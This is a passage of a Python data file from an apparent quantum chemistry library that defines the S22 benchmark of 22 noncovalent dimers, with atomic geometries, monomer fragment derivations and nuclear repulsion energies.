TAGL['%s-%s-monoB-CP' % (dbse, 22)] = 'Phenol from Phenol Dimer'
TAGL['%s-%s-monoA-unCP' % (dbse, 22)] = 'Phenol from Phenol Dimer'
TAGL['%s-%s-monoB-unCP' % (dbse, 22)] = 'Phenol from Phenol Dimer'
# <<< Geometry Specification Strings >>>
GEOS = {}
GEOS['%s-%s-dimer' % (dbse, '1')] = qcdb.Molecule("""
0 1
N -1.578718 -0.046611 0.000000
H -2.158621 0.136396 -0.809565
H -2.158621 0.136396 0.809565
H -0.849471 0.658193 0.000000
--
0 1
N 1.578718 0.046611 0.000000
H 2.158621 -0.136396 -0.809565
H 0.849471 -0.658193 0.000000
H 2.158621 -0.136396 0.809565
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '2')] = qcdb.Molecule("""
0 1
O -1.551007 -0.114520 0.000000
H -1.934259 0.762503 0.000000
H -0.599677 0.040712 0.000000
--
0 1
O 1.350625 0.111469 0.000000
H 1.680398 -0.373741 -0.758561
H 1.680398 -0.373741 0.758561
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '3')] = qcdb.Molecule("""
0 1
C -1.888896 -0.179692 0.000000
O -1.493280 1.073689 0.000000
O -1.170435 -1.166590 0.000000
H -2.979488 -0.258829 0.000000
H -0.498833 1.107195 0.000000
--
0 1
C 1.888896 0.179692 0.000000
O 1.493280 -1.073689 0.000000
O 1.170435 1.166590 0.000000
H 2.979488 0.258829 0.000000
H 0.498833 -1.107195 0.000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '4')] = qcdb.Molecule("""
0 1
C -2.018649 0.052883 0.000000
O -1.452200 1.143634 0.000000
N -1.407770 -1.142484 0.000000
H -1.964596 -1.977036 0.000000
H -0.387244 -1.207782 0.000000
H -3.117061 -0.013701 0.000000
--
0 1
C 2.018649 -0.052883 0.000000
O 1.452200 -1.143634 0.000000
N 1.407770 1.142484 0.000000
H 1.964596 1.977036 0.000000
H 0.387244 1.207782 0.000000
H 3.117061 0.013701 0.000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '5')] = qcdb.Molecule("""
0 1
O -1.4663316 1.0121693 0.0000000
C -0.6281464 1.9142678 0.0000000
N 0.7205093 1.6882688 0.0000000
C 1.6367290 2.7052764 0.0000000
C 1.2769036 4.0061763 0.0000000
C -0.1286005 4.3621549 0.0000000
N -0.9777230 3.2396433 0.0000000
O -0.5972229 5.4864066 0.0000000
H 2.0103504 4.7938642 0.0000000
H 1.0232515 0.7061820 0.0000000
H -1.9700268 3.4323850 0.0000000
H 2.6690620 2.3883417 0.0000000
--
0 1
O 1.4663316 -1.0121693 0.0000000
C 0.6281464 -1.9142678 0.0000000
N -0.7205093 -1.6882688 0.0000000
C -1.6367290 -2.7052764 0.0000000
C -1.2769036 -4.0061763 0.0000000
C 0.1286005 -4.3621549 0.0000000
N 0.9777230 -3.2396433 0.0000000
O 0.5972229 -5.4864066 0.0000000
H -2.0103504 -4.7938642 0.0000000
H -1.0232515 -0.7061820 0.0000000
H 1.9700268 -3.4323850 0.0000000
H -2.6690620 -2.3883417 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '6')] = qcdb.Molecule("""
0 1
O -1.3976213 -1.8858368 -0.3673061
N -1.4642550 0.3641828 0.0192301
C -4.1857398 0.3696669 0.0360960
C -3.4832598 1.5783111 0.2500752
C -2.1179502 1.5307048 0.2338383
C -2.0773833 -0.8637492 -0.1899414
C -3.5156032 -0.8051950 -0.1757585
H -5.2678045 0.3707428 0.0411419
H -3.9920334 2.5127560 0.4214414
H -1.4929196 2.3984096 0.3885018
H -4.0401226 -1.7348452 -0.3379269
H -0.4265266 0.3612127 0.0073538
--
0 1
N 1.4327616 0.3639703 -0.0159508
C 2.1154200 -0.7803450 0.1681099
C 3.5237586 -0.8016096 0.1545027
C 4.2185897 0.3735783 -0.0525929
C 3.5099708 1.5615014 -0.2449763
C 2.1280138 1.4953324 -0.2175374
H 4.0459206 -1.7361356 0.3076883
H 5.2999426 0.3666009 -0.0663349
H 4.0110923 2.5024313 -0.4130052
H 1.5339878 2.3893837 -0.3670565
N 1.3883123 -1.9083038 0.4198149
H 1.8694714 -2.7812773 0.2940385
H 0.4089067 -1.9079942 0.1300860
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '7')] = qcdb.Molecule("""
0 1
N 0.9350155 -0.0279801 -0.3788916
C 1.6739638 -0.0357766 0.7424316
C 3.0747955 -0.0094480 0.5994562
C 3.5646109 0.0195446 -0.7059872
N 2.8531510 0.0258031 -1.8409596
C 1.5490760 0.0012569 -1.5808009
N 4.0885824 -0.0054429 1.5289786
C 5.1829921 0.0253971 0.7872176
N 4.9294871 0.0412404 -0.5567274
N 1.0716177 -0.0765366 1.9391390
H 0.8794435 0.0050260 -2.4315709
H 6.1882591 0.0375542 1.1738824
H 5.6035368 0.0648755 -1.3036811
H 0.0586915 -0.0423765 2.0039181
H 1.6443796 -0.0347395 2.7619159
--
0 1
N -3.9211729 -0.0009646 -1.5163659
C -4.6136833 0.0169051 -0.3336520
C -3.9917387 0.0219348 0.8663338
C -2.5361367 0.0074651 0.8766724
N -1.9256484 -0.0110593 -0.3638948
C -2.5395897 -0.0149474 -1.5962357
C -4.7106131 0.0413373 2.1738637
O -1.8674730 0.0112093 1.9120833
O -1.9416783 -0.0291878 -2.6573783
H -4.4017172 -0.0036078 -2.4004924
H -0.8838255 -0.0216168 -0.3784269
H -5.6909220 0.0269347 -0.4227183
H -4.4439282 -0.8302573 2.7695655
H -4.4267056 0.9186178 2.7530256
H -5.7883971 0.0505530 2.0247280
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '8')] = qcdb.Molecule("""
0 1
C 0.000000 -0.000140 1.859161
H -0.888551 0.513060 1.494685
H 0.888551 0.513060 1.494685
H 0.000000 -1.026339 1.494868
H 0.000000 0.000089 2.948284
--
0 1
C 0.000000 0.000140 -1.859161
H 0.000000 -0.000089 -2.948284
H -0.888551 -0.513060 -1.494685
H 0.888551 -0.513060 -1.494685
H 0.000000 1.026339 -1.494868
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '9')] = qcdb.Molecule("""
0 1
C -0.471925 -0.471925 -1.859111
C 0.471925 0.471925 -1.859111
H -0.872422 -0.872422 -0.936125
H 0.872422 0.872422 -0.936125
H -0.870464 -0.870464 -2.783308
H 0.870464 0.870464 -2.783308
--
0 1
C -0.471925 0.471925 1.859111
C 0.471925 -0.471925 1.859111
H -0.872422 0.872422 0.936125
H 0.872422 -0.872422 0.936125
H -0.870464 0.870464 2.783308
H 0.870464 -0.870464 2.783308
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '10')] = qcdb.Molecule("""
0 1
C 1.3932178 0.0362913 -0.6332803
C 0.7280364 -1.1884015 -0.6333017
C -0.6651797 -1.2247077 -0.6332803
C -1.3932041 -0.0362972 -0.6333017
C -0.7280381 1.1884163 -0.6332803
C 0.6651677 1.2246987 -0.6333017
H 2.4742737 0.0644484 -0.6317240
H 1.2929588 -2.1105409 -0.6317401
H -1.1813229 -2.1750081 -0.6317240
H -2.4742614 -0.0644647 -0.6317401
H -1.2929508 2.1105596 -0.6317240
H 1.1813026 2.1750056 -0.6317401
--
0 1
C 0.0000000 0.0000000 3.0826195
H 0.5868776 0.8381742 3.4463772
H -1.0193189 0.0891638 3.4463772
H 0.0000000 0.0000000 1.9966697
H 0.4324413 -0.9273380 3.4463772
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '11')] = qcdb.Molecule("""
0 1
C -1.0478252 -1.4216736 0.0000000
C -1.4545034 -0.8554459 1.2062048
C -1.4545034 -0.8554459 -1.2062048
C -2.2667970 0.2771610 1.2069539
C -2.6714781 0.8450211 0.0000000
C -2.2667970 0.2771610 -1.2069539
H -1.1338534 -1.2920593 -2.1423150
H -2.5824943 0.7163066 -2.1437977
H -3.3030422 1.7232700 0.0000000
H -2.5824943 0.7163066 2.1437977
H -1.1338534 -1.2920593 2.1423150
H -0.4060253 -2.2919049 0.0000000
--
0 1
C 1.0478252 1.4216736 0.0000000
C 1.4545034 0.8554459 -1.2062048
C 1.4545034 0.8554459 1.2062048
C 2.2667970 -0.2771610 -1.2069539
C 2.6714781 -0.8450211 0.0000000
C 2.2667970 -0.2771610 1.2069539
H 0.4060253 2.2919049 0.0000000
H 1.1338534 1.2920593 2.1423150
H 2.5824943 -0.7163066 2.1437977
H 3.3030422 -1.7232700 0.0000000
H 2.5824943 -0.7163066 -2.1437977
H 1.1338534 1.2920593 -2.1423150
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '12')] = qcdb.Molecule("""
0 1
C -1.2471894 -1.1718212 -0.6961388
C -1.2471894 -1.1718212 0.6961388
N -0.2589510 -1.7235771 1.4144796
C 0.7315327 -2.2652221 0.6967288
C 0.7315327 -2.2652221 -0.6967288
N -0.2589510 -1.7235771 -1.4144796
H -2.0634363 -0.7223199 -1.2472797
H -2.0634363 -0.7223199 1.2472797
H 1.5488004 -2.7128282 1.2475604
H 1.5488004 -2.7128282 -1.2475604
--
0 1
C -0.3380031 2.0800608 1.1300452
C 0.8540254 1.3593471 1.1306308
N 1.4701787 0.9907598 0.0000000
C 0.8540254 1.3593471 -1.1306308
C -0.3380031 2.0800608 -1.1300452
N -0.9523059 2.4528836 0.0000000
H -0.8103758 2.3643033 2.0618643
H 1.3208583 1.0670610 2.0623986
H 1.3208583 1.0670610 -2.0623986
H -0.8103758 2.3643033 -2.0618643
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '13')] = qcdb.Molecule("""
0 1
N 2.0113587 -1.2132073 -0.0980673
C 2.0257076 -0.6971797 -1.3644029
H 2.2975208 -1.3910592 -2.1456459
C 1.7145226 0.5919651 -1.6124892
H 1.7272873 0.9908466 -2.6120050
C 1.3089605 1.4575340 -0.5205890
O 0.9205926 2.6110864 -0.6260457
N 1.3768885 0.8397454 0.7346356
H 1.0518040 1.3862229 1.5233710
C 1.6459909 -0.4852113 1.0187267
O 1.5611090 -0.9718061 2.1298059
H 2.1294635 -2.2015046 0.0568134
--
0 1
N -2.0113587 1.2132073 -0.0980673
C -2.0257076 0.6971797 -1.3644029
H -2.2975208 1.3910592 -2.1456459
C -1.7145226 -0.5919651 -1.6124892
H -1.7272873 -0.9908466 -2.6120050
C -1.3089605 -1.4575340 -0.5205890
O -0.9205926 -2.6110864 -0.6260457
N -1.3768885 -0.8397454 0.7346356
H -1.0518040 -1.3862229 1.5233710
C -1.6459909 0.4852113 1.0187267
O -1.5611090 0.9718061 2.1298059
H -2.1294635 2.2015046 0.0568134
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '14')] = qcdb.Molecule("""
0 1
C -0.0210742 1.5318615 -1.3639345
C -1.2746794 0.9741030 -1.6074097
C -1.3783055 -0.2256981 -2.3084154
C -0.2289426 -0.8664053 -2.7687944
C 1.0247882 -0.3035171 -2.5312410
C 1.1289996 0.8966787 -1.8299830
H 0.0600740 2.4565627 -0.8093957
H -2.1651002 1.4654521 -1.2405676
H -2.3509735 -0.6616122 -2.4926698
H -0.3103419 -1.7955762 -3.3172704
H 1.9165847 -0.7940845 -2.8993942
H 2.1000347 1.3326757 -1.6400420
--
0 1
H -2.9417647 0.8953834 2.2239054
C -2.0220674 0.4258540 1.9013549
C -0.8149418 1.0740453 2.1066982
H -0.7851529 2.0443812 2.5856086
C 0.3704286 0.4492852 1.6847458
C 1.7508619 0.8038935 1.7194004
H 2.1870108 1.6998281 2.1275903
C 2.4451359 -0.2310742 1.1353313
N 1.5646462 -1.2137812 0.7555384
C 0.2861214 -0.8269486 1.0618752
C -0.9284667 -1.4853121 0.8606937
H -0.9729200 -2.4554847 0.3834013
C -2.0792848 -0.8417668 1.2876443
H -3.0389974 -1.3203846 1.1468400
H 1.8075741 -2.0366963 0.2333038
H 3.5028794 -0.3485344 0.9695233
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '15')] = qcdb.Molecule("""
0 1
N 0.2793014 2.4068393 -0.6057517
C -1.0848570 2.4457461 -0.5511608
H -1.6594403 3.0230294 -1.2560905
N -1.5977117 1.7179877 0.4287543
C -0.4897255 1.1714358 1.0301910
C -0.3461366 0.2914710 2.1172343
N -1.4187090 -0.1677767 2.8101441
H -1.2388750 -0.9594802 3.4047578
H -2.2918734 -0.1788223 2.3073619
N 0.8857630 -0.0700763 2.4919494
C 1.9352348 0.4072878 1.7968022
H 2.9060330 0.0788414 2.1458181
N 1.9409775 1.2242019 0.7402202
C 0.6952186 1.5779858 0.4063984
H 0.8610073 2.8298045 -1.3104502
--
0 1
N 1.2754606 -0.6478993 -1.9779104
C 1.4130533 -1.5536850 -0.9550667
H 2.4258769 -1.8670780 -0.7468778
C 0.3575976 -2.0239499 -0.2530575
C 0.4821292 -3.0179494 0.8521221
H 0.1757705 -2.5756065 1.7986281
H -0.1601691 -3.8770412 0.6639498
H 1.5112443 -3.3572767 0.9513659
C -0.9684711 -1.5298112 -0.5939792
O -2.0029280 -1.8396957 -0.0199453
N -0.9956916 -0.6383870 -1.6720420
H -1.9014057 -0.2501720 -1.8985760
C 0.0684702 -0.1191762 -2.3763759
O -0.0397875 0.7227006 -3.2531083
H 2.0853289 -0.2760176 -2.4454577
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '16')] = qcdb.Molecule("""
0 1
C 0.000000 -0.667578 -2.124659
C 0.000000 0.667578 -2.124659
H 0.923621 -1.232253 -2.126185
H -0.923621 -1.232253 -2.126185
H -0.923621 1.232253 -2.126185
H 0.923621 1.232253 -2.126185
--
0 1
C 0.000000 0.000000 2.900503
C 0.000000 0.000000 1.693240
H 0.000000 0.000000 0.627352
H 0.000000 0.000000 3.963929
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '17')] = qcdb.Molecule("""
0 1
C 0.7806117 -0.6098875 -1.2075426
C 0.4784039 0.7510406 -1.2079040
C 0.3276592 1.4318573 0.0000000
C 0.4784039 0.7510406 1.2079040
C 0.7806117 -0.6098875 1.2075426
C 0.9321510 -1.2899614 0.0000000
H 0.8966688 -1.1376051 -2.1441482
H 0.3573895 1.2782091 -2.1440546
H 0.0918593 2.4871407 0.0000000
H 0.3573895 1.2782091 2.1440546
H 0.8966688 -1.1376051 2.1441482
H 1.1690064 -2.3451668 0.0000000
--
0 1
O -2.7885270 -0.2744854 0.0000000
H -2.6229114 -1.2190831 0.0000000
H -1.9015103 0.0979110 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '18')] = qcdb.Molecule("""
0 1
C -0.7392810 0.5158785 -1.2071079
C -1.4261442 0.3965455 0.0000000
C -0.7392810 0.5158785 1.2071079
C 0.6342269 0.7546398 1.2070735
C 1.3210434 0.8737566 0.0000000
C 0.6342269 0.7546398 -1.2070735
H -1.2719495 0.4206316 -2.1432894
H -2.4902205 0.2052381 0.0000000
H -1.2719495 0.4206316 2.1432894
H 1.1668005 0.8474885 2.1436950
H 2.3863585 1.0596312 0.0000000
H 1.1668005 0.8474885 -2.1436950
--
0 1
N 0.1803930 -2.9491231 0.0000000
H 0.7595495 -3.1459477 -0.8060729
H 0.7595495 -3.1459477 0.8060729
H 0.0444167 -1.9449399 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '19')] = qcdb.Molecule("""
0 1
C -0.7097741 -0.9904230 1.2077018
C -1.4065340 -0.9653529 0.0000000
C -0.7097741 -0.9904230 -1.2077018
C 0.6839651 -1.0405105 -1.2078652
C 1.3809779 -1.0655522 0.0000000
C 0.6839651 -1.0405105 1.2078652
H -1.2499482 -0.9686280 2.1440507
H -2.4869197 -0.9237060 0.0000000
H -1.2499482 -0.9686280 -2.1440507
H 1.2242882 -1.0580753 -2.1442563
H 2.4615886 -1.1029818 0.0000000
H 1.2242882 -1.0580753 2.1442563
--
0 1
N -0.0034118 3.5353926 0.0000000
C 0.0751963 2.3707040 0.0000000
H 0.1476295 1.3052847 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '20')] = qcdb.Molecule("""
0 1
C 0.0000000 0.0000000 1.0590353
C 0.0000000 -1.2060084 1.7576742
C 0.0000000 -1.2071767 3.1515905
C 0.0000000 0.0000000 3.8485751
C 0.0000000 1.2071767 3.1515905
C 0.0000000 1.2060084 1.7576742
H 0.0000000 0.0000000 -0.0215805
H 0.0000000 -2.1416387 1.2144217
H 0.0000000 -2.1435657 3.6929953
H 0.0000000 0.0000000 4.9301499
H 0.0000000 2.1435657 3.6929953
H 0.0000000 2.1416387 1.2144217
--
0 1
C -1.3940633 0.0000000 -2.4541524
C -0.6970468 1.2072378 -2.4546277
C 0.6970468 1.2072378 -2.4546277
C 1.3940633 0.0000000 -2.4541524
C 0.6970468 -1.2072378 -2.4546277
C -0.6970468 -1.2072378 -2.4546277
H -2.4753995 0.0000000 -2.4503221
H -1.2382321 2.1435655 -2.4536764
H 1.2382321 2.1435655 -2.4536764
H 2.4753995 0.0000000 -2.4503221
H 1.2382321 -2.1435655 -2.4536764
H -1.2382321 -2.1435655 -2.4536764
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '21')] = qcdb.Molecule("""
0 1
C 2.5118997 1.6250148 0.0000000
C 2.7130094 0.9578537 -1.2082918
C 3.1177821 -0.3767436 -1.2083647
C 3.3213848 -1.0437307 0.0000000
C 3.1177821 -0.3767436 1.2083647
C 2.7130094 0.9578537 1.2082918
H 2.2024038 2.6611358 0.0000000
H 2.5511760 1.4736908 -2.1445900
H 3.2702999 -0.8951406 -2.1448379
H 3.6368139 -2.0781521 0.0000000
H 3.2702999 -0.8951406 2.1448379
H 2.5511760 1.4736908 2.1445900
--
0 1
H 0.8065245 -0.4358866 0.0000000
N -0.1442408 -0.7686927 0.0000000
C -0.5161122 -2.0893220 0.0000000
C -1.8898755 -2.1814495 0.0000000
C -2.3932317 -0.8470830 0.0000000
C -1.2640653 0.0195887 0.0000000
C -1.3896004 1.4117668 0.0000000
C -2.6726501 1.9366450 0.0000000
C -3.8054511 1.0974790 0.0000000
C -3.6798167 -0.2817209 0.0000000
H 0.2310024 -2.8653173 0.0000000
H -2.4585759 -3.0956052 0.0000000
H -0.5188733 2.0539520 0.0000000
H -2.8077570 3.0097859 0.0000000
H -4.7905991 1.5439372 0.0000000
H -4.5580187 -0.9142916 0.0000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '22')] = qcdb.Molecule("""
0 1
C -2.0071056 0.7638459 -0.1083509
O -1.3885044 1.9298523 -0.4431206
H -0.5238121 1.9646519 -0.0064609
C -1.4630807 -0.1519120 0.7949930
C -2.1475789 -1.3295094 1.0883677
C -3.3743208 -1.6031427 0.4895864
C -3.9143727 -0.6838545 -0.4091028
C -3.2370496 0.4929609 -0.7096126
H -0.5106510 0.0566569 1.2642563
H -1.7151135 -2.0321452 1.7878417
H -3.9024664 -2.5173865 0.7197947
H -4.8670730 -0.8822939 -0.8811319
H -3.6431662 1.2134345 -1.4057590
--
0 1
O 1.3531168 1.9382724 0.4723133
C 2.0369747 0.7865043 0.1495491
H 1.7842846 2.3487495 1.2297110
C 1.5904026 0.0696860 -0.9574153
C 2.2417367 -1.1069765 -1.3128110
C 3.3315674 -1.5665603 -0.5748636
C 3.7696838 -0.8396901 0.5286439
C 3.1224836 0.3383498 0.8960491
H 0.7445512 0.4367983 -1.5218583
H 1.8921463 -1.6649726 -2.1701843
H 3.8330227 -2.4811537 -0.8566666
H 4.6137632 -1.1850101 1.1092635
H 3.4598854 0.9030376 1.7569489
units angstrom
""")
# <<< Derived Geometry Strings >>>
for rxn in HRXN:
GEOS['%s-%s-monoA-unCP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(1)
GEOS['%s-%s-monoB-unCP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(2)
GEOS['%s-%s-monoA-CP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(1, 2)
GEOS['%s-%s-monoB-CP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(2, 1)
#########################################################################
# <<< Supplementary Quantum Chemical Results >>>
DATA = {}
DATA['NUCLEAR REPULSION ENERGY'] = {}
DATA['NUCLEAR REPULSION ENERGY']['S22-1-dimer'] = 40.3142398391
DATA['NUCLEAR REPULSION ENERGY']['S22-2-dimer'] = 36.6628478528
DATA['NUCLEAR REPULSION ENERGY']['S22-3-dimer'] = 235.946620315
DATA['NUCLEAR REPULSION ENERGY']['S22-4-dimer'] = 230.794855209
DATA['NUCLEAR REPULSION ENERGY']['S22-5-dimer'] = 1032.28191174
DATA['NUCLEAR REPULSION ENERGY']['S22-6-dimer'] = 812.288526081
DATA['NUCLEAR REPULSION ENERGY']['S22-7-dimer'] = 1365.23227533
DATA['NUCLEAR REPULSION ENERGY']['S22-8-dimer'] = 41.0002637953
DATA['NUCLEAR REPULSION ENERGY']['S22-9-dimer'] = 102.165309277
DATA['NUCLEAR REPULSION ENERGY']['S22-10-dimer'] = 272.461820278
DATA['NUCLEAR REPULSION ENERGY']['S22-11-dimer'] = 628.972056837
DATA['NUCLEAR REPULSION ENERGY']['S22-12-dimer'] = 654.132022225
DATA['NUCLEAR REPULSION ENERGY']['S22-13-dimer'] = 1161.47069828
DATA['NUCLEAR REPULSION ENERGY']['S22-14-dimer'] = 935.530103761
DATA['NUCLEAR REPULSION ENERGY']['S22-15-dimer'] = 1542.1430487
DATA['NUCLEAR REPULSION ENERGY']['S22-16-dimer'] = 85.1890641964
DATA['NUCLEAR REPULSION ENERGY']['S22-17-dimer'] = 273.329424698
DATA['NUCLEAR REPULSION ENERGY']['S22-18-dimer'] = 273.279614381
DATA['NUCLEAR REPULSION ENERGY']['S22-19-dimer'] = 303.281397519
DATA['NUCLEAR REPULSION ENERGY']['S22-20-dimer'] = 592.416645285
DATA['NUCLEAR REPULSION ENERGY']['S22-21-dimer'] = 876.919230124
DATA['NUCLEAR REPULSION ENERGY']['S22-22-dimer'] = 805.117733746
DATA['NUCLEAR REPULSION ENERGY']['S22-1-monoA-unCP'] = 11.9474317239
DATA['NUCLEAR REPULSION ENERGY']['S22-1-monoB-unCP'] = 11.9474317239
DATA['NUCLEAR REPULSION ENERGY']['S22-2-monoA-unCP'] = 9.16383014597
DATA['NUCLEAR REPULSION ENERGY']['S22-2-monoB-unCP'] = 9.1780389049
DATA['NUCLEAR REPULSION ENERGY']['S22-3-monoA-unCP'] = 70.1157833033
DATA['NUCLEAR REPULSION ENERGY']['S22-3-monoB-unCP'] = 70.1157833033
DATA['NUCLEAR REPULSION ENERGY']['S22-4-monoA-unCP'] = 71.0728637475
DATA['NUCLEAR REPULSION ENERGY']['S22-4-monoB-unCP'] = 71.0728637475
DATA['NUCLEAR REPULSION ENERGY']['S22-5-monoA-unCP'] = 357.226773232
DATA['NUCLEAR REPULSION ENERGY']['S22-5-monoB-unCP'] = 357.226773232
DATA['NUCLEAR REPULSION ENERGY']['S22-6-monoA-unCP'] = 275.701873893
DATA['NUCLEAR REPULSION ENERGY']['S22-6-monoB-unCP'] = 275.671980226
DATA['NUCLEAR REPULSION ENERGY']['S22-7-monoA-unCP'] = 503.396306786
DATA['NUCLEAR REPULSION ENERGY']['S22-7-monoB-unCP'] = 440.301569251
DATA['NUCLEAR REPULSION ENERGY']['S22-8-monoA-unCP'] = 13.4480422656
DATA['NUCLEAR REPULSION ENERGY']['S22-8-monoB-unCP'] = 13.4480422656
DATA['NUCLEAR REPULSION ENERGY']['S22-9-monoA-unCP'] = 33.3602695815
DATA['NUCLEAR REPULSION ENERGY']['S22-9-monoB-unCP'] = 33.3602695815
DATA['NUCLEAR REPULSION ENERGY']['S22-10-monoA-unCP'] = 203.707991166
DATA['NUCLEAR REPULSION ENERGY']['S22-10-monoB-unCP'] = 13.4855266506
DATA['NUCLEAR REPULSION ENERGY']['S22-11-monoA-unCP'] = 203.71093056
DATA['NUCLEAR REPULSION ENERGY']['S22-11-monoB-unCP'] = 203.71093056
DATA['NUCLEAR REPULSION ENERGY']['S22-12-monoA-unCP'] = 208.639691163
DATA['NUCLEAR REPULSION ENERGY']['S22-12-monoB-unCP'] = 208.626286711
DATA['NUCLEAR REPULSION ENERGY']['S22-13-monoA-unCP'] = 357.160450068
DATA['NUCLEAR REPULSION ENERGY']['S22-13-monoB-unCP'] = 357.160450068
DATA['NUCLEAR REPULSION ENERGY']['S22-14-monoA-unCP'] = 203.669533561
DATA['NUCLEAR REPULSION ENERGY']['S22-14-monoB-unCP'] = 401.143592213
DATA['NUCLEAR REPULSION ENERGY']['S22-15-monoA-unCP'] = 503.365644851
DATA['NUCLEAR REPULSION ENERGY']['S22-15-monoB-unCP'] = 440.147006891
DATA['NUCLEAR REPULSION ENERGY']['S22-16-monoA-unCP'] = 33.3580720823
DATA['NUCLEAR REPULSION ENERGY']['S22-16-monoB-unCP'] = 24.6979461028
DATA['NUCLEAR REPULSION ENERGY']['S22-17-monoA-unCP'] = 203.633716029
DATA['NUCLEAR REPULSION ENERGY']['S22-17-monoB-unCP'] = 9.16734256253
DATA['NUCLEAR REPULSION ENERGY']['S22-18-monoA-unCP'] = 203.672752811
DATA['NUCLEAR REPULSION ENERGY']['S22-18-monoB-unCP'] = 11.9610533611
DATA['NUCLEAR REPULSION ENERGY']['S22-19-monoA-unCP'] = 203.595134421
DATA['NUCLEAR REPULSION ENERGY']['S22-19-monoB-unCP'] = 23.6698792311
DATA['NUCLEAR REPULSION ENERGY']['S22-20-monoA-unCP'] = 203.681438992
DATA['NUCLEAR REPULSION ENERGY']['S22-20-monoB-unCP'] = 203.664080154
DATA['NUCLEAR REPULSION ENERGY']['S22-21-monoA-unCP'] = 203.56582964
DATA['NUCLEAR REPULSION ENERGY']['S22-21-monoB-unCP'] = 401.056606452
DATA['NUCLEAR REPULSION ENERGY']['S22-22-monoA-unCP'] = 271.438700576
DATA['NUCLEAR REPULSION ENERGY']['S22-22-monoB-unCP'] = 271.346177694
DATA['NUCLEAR REPULSION ENERGY']['S22-1-monoA-CP'] = 11.9474317239
DATA['NUCLEAR REPULSION ENERGY']['S22-1-monoB-CP'] = 11.9474317239
DATA['NUCLEAR REPULSION ENERGY']['S22-2-monoA-CP'] = 9.16383014597
DATA['NUCLEAR REPULSION ENERGY']['S22-2-monoB-CP'] = 9.1780389049
DATA['NUCLEAR REPULSION ENERGY']['S22-3-monoA-CP'] = 70.1157833033
DATA['NUCLEAR REPULSION ENERGY']['S22-3-monoB-CP'] = 70.1157833033
DATA['NUCLEAR REPULSION ENERGY']['S22-4-monoA-CP'] = 71.0728637475
DATA['NUCLEAR REPULSION ENERGY']['S22-4-monoB-CP'] = 71.0728637475
DATA['NUCLEAR REPULSION ENERGY']['S22-5-monoA-CP'] = 357.226773232
DATA['NUCLEAR REPULSION ENERGY']['S22-5-monoB-CP'] = 357.226773232
DATA['NUCLEAR REPULSION ENERGY']['S22-6-monoA-CP'] = 275.701873893
DATA['NUCLEAR REPULSION ENERGY']['S22-6-monoB-CP'] = 275.671980226
DATA['NUCLEAR REPULSION ENERGY']['S22-7-monoA-CP'] = 503.396306786
DATA['NUCLEAR REPULSION ENERGY']['S22-7-monoB-CP'] = 440.301569251
DATA['NUCLEAR REPULSION ENERGY']['S22-8-monoA-CP'] = 13.4480422656
DATA['NUCLEAR REPULSION ENERGY']['S22-8-monoB-CP'] = 13.4480422656
DATA['NUCLEAR REPULSION ENERGY']['S22-9-monoA-CP'] = 33.3602695815
DATA['NUCLEAR REPULSION ENERGY']['S22-9-monoB-CP'] = 33.3602695815
DATA['NUCLEAR REPULSION ENERGY']['S22-10-monoA-CP'] = 203.707991166
DATA['NUCLEAR REPULSION ENERGY']['S22-10-monoB-CP'] = 13.4855266506
DATA['NUCLEAR REPULSION ENERGY']['S22-11-monoA-CP'] = 203.71093056
DATA['NUCLEAR REPULSION ENERGY']['S22-11-monoB-CP'] = 203.71093056
DATA['NUCLEAR REPULSION ENERGY']['S22-12-monoA-CP'] = 208.639691163
DATA['NUCLEAR REPULSION ENERGY']['S22-12-monoB-CP'] = 208.626286711
DATA['NUCLEAR REPULSION ENERGY']['S22-13-monoA-CP'] = 357.160450068
DATA['NUCLEAR REPULSION ENERGY']['S22-13-monoB-CP'] = 357.160450068
DATA['NUCLEAR REPULSION ENERGY']['S22-14-monoA-CP'] = 203.669533561
DATA['NUCLEAR REPULSION ENERGY']['S22-14-monoB-CP'] = 401.143592213
DATA['NUCLEAR REPULSION ENERGY']['S22-15-monoA-CP'] = 503.365644851
DATA['NUCLEAR REPULSION ENERGY']['S22-15-monoB-CP'] = 440.147006891
DATA['NUCLEAR REPULSION ENERGY']['S22-16-monoA-CP'] = 33.3580720823
DATA['NUCLEAR REPULSION ENERGY']['S22-16-monoB-CP'] = 24.6979461028
DATA['NUCLEAR REPULSION ENERGY']['S22-17-monoA-CP'] = 203.633716029
DATA['NUCLEAR REPULSION ENERGY']['S22-17-monoB-CP'] = 9.16734256253
DATA['NUCLEAR REPULSION ENERGY']['S22-18-monoA-CP'] = 203.672752811
DATA['NUCLEAR REPULSION ENERGY']['S22-18-monoB-CP'] = 11.9610533611
DATA['NUCLEAR REPULSION ENERGY']['S22-19-monoA-CP'] = 203.595134421
DATA['NUCLEAR REPULSION ENERGY']['S22-19-monoB-CP'] = 23.6698792311
DATA['NUCLEAR REPULSION ENERGY']['S22-20-monoA-CP'] = 203.681438992
DATA['NUCLEAR REPULSION ENERGY']['S22-20-monoB-CP'] = 203.664080154
DATA['NUCLEAR REPULSION ENERGY']['S22-21-monoA-CP'] = 203.56582964
DATA['NUCLEAR REPULSION ENERGY']['S22-21-monoB-CP'] = 401.056606452
